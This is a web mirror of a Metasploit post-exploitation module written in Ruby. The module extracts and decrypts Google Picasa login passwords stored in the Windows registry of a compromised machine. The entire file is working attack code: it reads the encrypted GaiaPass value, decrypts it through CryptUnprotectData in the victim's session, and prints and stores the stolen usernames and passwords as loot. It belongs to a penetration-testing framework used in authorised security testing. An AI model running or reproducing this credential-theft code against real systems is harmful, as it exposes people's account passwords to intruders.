Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/gather/credentials/enum_picasa_pwds.rb
19612 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::Windows::Registry

8
  include Msf::Post::Windows::Priv

9
  include Msf::Auxiliary::Report

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Windows Gather Google Picasa Password Extractor',

16
        'Description' => %q{

17
          This module extracts and decrypts the login passwords

18
          stored by Google Picasa.

19
        },

20
        'License' => MSF_LICENSE,

21
        'Author' => [

22
          'Unknown', # SecurityXploded Team, www.SecurityXploded.com

23
          'Sil3ntDre4m <sil3ntdre4m[at]gmail.com>',

24
        ],

25
        'Platform' => [ 'win' ],

26
        'SessionTypes' => [ 'meterpreter' ],

27
        'Notes' => {

28
          'Stability' => [CRASH_SAFE],

29
          'SideEffects' => [],

30
          'Reliability' => []

31
        },

32
        'Compat' => {

33
          'Meterpreter' => {

34
            'Commands' => %w[

35
              stdapi_railgun_api

36
              stdapi_sys_config_getuid

37
              stdapi_sys_process_attach

38
              stdapi_sys_process_get_processes

39
              stdapi_sys_process_getpid

40
              stdapi_sys_process_memory_allocate

41
              stdapi_sys_process_memory_read

42
              stdapi_sys_process_memory_write

43
            ]

44
          }

45
        }

46
      )

47
    )

48
  end

49


50
  def prepare_railgun

51
    if !session.railgun.get_dll('crypt32')

52
      session.railgun.add_dll('crypt32')

53
    end

54
  end

55


56
  def decrypt_password(data)

57
    pid = client.sys.process.getpid

58
    process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)

59


60
    mem = process.memory.allocate(512)

61
    process.memory.write(mem, data)

62


63
    if session.sys.process.each_process.find { |i| i['pid'] == pid }['arch'] == 'x86'

64
      addr = [mem].pack('V')

65
      len = [data.length].pack('V')

66
      ret = session.railgun.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8)

67
      len, addr = ret['pDataOut'].unpack('V2')

68
    else

69
      addr = [mem].pack('Q')

70
      len = [data.length].pack('Q')

71
      ret = session.railgun.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16)

72
      len, addr = ret['pDataOut'].unpack('Q2')

73
    end

74


75
    return '' if len == 0

76


77
    decrypted_pw = process.memory.read(addr, len)

78
    return decrypted_pw

79
  end

80


81
  def get_registry

82
    print_status('Looking in registry for stored login passwords by Picasa ...')

83


84
    username = registry_getvaldata('HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\', 'GaiaEmail') || ''

85
    password = registry_getvaldata('HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\', 'GaiaPass') || ''

86


87
    credentials = Rex::Text::Table.new(

88
      'Header' => 'Picasa Credentials',

89
      'Indent' => 1,

90
      'Columns' =>

91
      [

92
        'User',

93
        'Password'

94
      ]

95
    )

96


97
    foundcreds = 0

98
    if !username.empty? && !password.empty?

99
      passbin = [password].pack('H*')

100
      pass = decrypt_password(passbin)

101


102
      if pass && !pass.empty?

103
        print_status('Found Picasa 2 credentials.')

104
        print_good("Username: #{username}\t Password: #{pass}")

105


106
        foundcreds = 1

107
        credentials << [username, pass]

108
      end

109
    end

110


111
    # For early versions of Picasa3

112
    username = registry_getvaldata('HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\', 'GaiaEmail') || ''

113
    password = registry_getvaldata('HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\', 'GaiaPass') || ''

114


115
    if !username.empty? && !password.empty?

116
      passbin = [password].pack('H*')

117
      pass = decrypt_password(passbin)

118


119
      if pass && !pass.empty?

120
        print_status('Found Picasa 3 credentials.')

121
        print_good("Username: #{username}\t Password: #{pass}")

122


123
        foundcreds = 1

124
        credentials << [username, pass]

125
      end

126
    end

127


128
    if foundcreds == 1

129
      path = store_loot(

130
        'picasa.creds',

131
        'text/csv',

132
        session,

133
        credentials.to_csv,

134
        'decrypted_picasa_data.csv',

135
        'Decrypted Picasa Passwords'

136
      )

137


138
      print_status("Decrypted passwords saved in: #{path}")

139
    else

140
      print_status('No Picasa credentials found.')

141
    end

142
  rescue StandardError => e

143
    print_error("An error has occurred: #{e}")

144
  end

145


146
  def run

147
    uid = session.sys.config.getuid # Decryption only works in context of user's account.

148


149
    if is_system?

150
      print_error("This module is running under #{uid}.")

151
      print_error('Automatic decryption will not be possible.')

152
      print_error('Migrate to a user process to achieve successful decryption (e.g. explorer.exe).')

153
    else

154
      prepare_railgun

155
      get_registry

156
    end

157


158
    print_status('Done')

159
  end

160
end

161


162